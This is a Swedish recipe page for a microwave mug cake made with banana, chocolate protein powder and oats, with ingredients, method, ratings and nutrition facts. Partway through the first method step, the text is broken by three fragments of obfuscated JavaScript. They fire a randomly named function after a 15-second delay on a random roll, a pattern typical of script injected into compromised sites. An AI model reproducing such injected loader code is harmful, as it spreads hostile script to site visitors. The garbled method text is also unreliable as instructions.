Mugcake med smak av banan och choklad

2013-08-29
imageimageimage
  • Yield : 1
  • Servings : 1
  • Prep Time : 5m
  • Cook Time : 2m
  • Ready In : 7m

Ingredienser

    • 1 Ägg
    • 1/2 Banan
    • 1 dl Fiberhavregryn
    • 1/2 skopa Chokladproteinpulver
    • 1/2 dl Lättmjölk
    • 50 g Kvarg 10 %
    • 1 dl Hallon
    • Salt & Kanel

Gör så här:

Mosa bananen
blandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a den tillsammans med havregrynet, proteinpulvret
och mjölken. Tillsätt lite salt och kanel i smeten
Tag valfri kopp och häll upp smeten
Ställ in i micron på full effekt i ca 1,5 – 2 min

Servera i muggen eller lägg kakan på en tallrik
Toppa med kvarg, hallon och lite kanel

Medlemsbetyg

(3.8 / 5)

3.8 5 4
Betygsätt recept

4 people rated this recipe

Related Recipes:
  • Nutellapannkakor

    Nutellapannkakor

  • _SAM0985

    Lowcarb Carbonara

  • _SAM0905

    Sallad på svartvitlöks rostad pumpa, lök, paprika, tomat med chevreost, spenat och svartkålschips.

  • Avokado & äggmacka

    Avokado & äggmacka

  • Vitchoklad & hallonpudding

    Vitchoklad & hallonpudding

Näringssinnehåll

Informationen gäller per portion

  • Kcal

    434
  • Potein

    37,9 g
  • Kolhydrater

    25,8 g
  • Fett

    17,4 g

Recipe Comments

Post A Comment

Current ye@r *